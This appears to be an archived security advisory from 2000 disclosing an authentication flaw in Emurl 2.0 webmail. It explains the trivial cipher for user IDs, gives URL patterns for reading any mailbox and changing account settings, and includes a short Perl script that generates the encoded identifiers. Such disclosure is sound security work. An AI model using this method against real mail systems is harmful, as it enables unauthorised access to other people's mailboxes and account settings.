Emurl 2.0 Exposes Users" Mailboxes

Emurl 2.0 Exposes Users Mailboxes
Reported May 15, 2000 by Pierre Benoit

VERSIONS EFFECTED

Emurl 2.0 for Windows NT 4.0

DESCRIPTION

Emurl allows Web-based access to user mailboxes via an encoded URL. Due to a flaw in the product design, a user who can properly encode a user account number can also access any mailbox on the system without the use of a password. Furthermore, if identical mailboxes exist on two or more systems, the same URL could be used to access the mailbox on all those systems.

A typical Emurl would appear as follows:

\[ wrapped \]
http://www.somesite.com/scripts/emurl/RECMAN.dll?
TYPE=RECIEVEMAIL&USER=113100104114116111123

Account numbers are encoded with the use of a simple cypher. For example, a user ID of "PBenoit" would result in an account identifier of 113100104114116111123.

p = 112 + 1 = 113
b = 98 + 2 = 100
e = 101 + 3 = 104
n = 110 + 4 = 114
o = 111 + 5 = 116
i = 105 + 6 = 111
t = 116 + 7 = 123

Account settings can also be changed by using a common URL found in Emurl packages:

\[ wrapped \]
http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll
?TYPE=USER&USER=<identifier>

DEMONSTRATION

The following code with generate an account number for a given mailbox name:

print "Enter your ID: ";
$_=lc(<STDIN>); chomp;
print "Your identifier is: ";
@letters=split(//, $_);
for ($i = 0; $i < length($_); $i++) \{
$mychar = ord($letters\[$i\])+$i+1;
if ($mychar < 100)
\{ $mychar = (0).$mychar;\}
print $mychar
\}

VENDOR RESPONSE

SeattleLab is aware and the issue released an updated version that corrects the problems.

CREDITS
Discovered and reported by Pierre Benoit

Comments

Plain text

Emurl 2.0 Exposes Users&quot; Mailboxes

Comments

Plain text

Emurl 2.0 Exposes Users" Mailboxes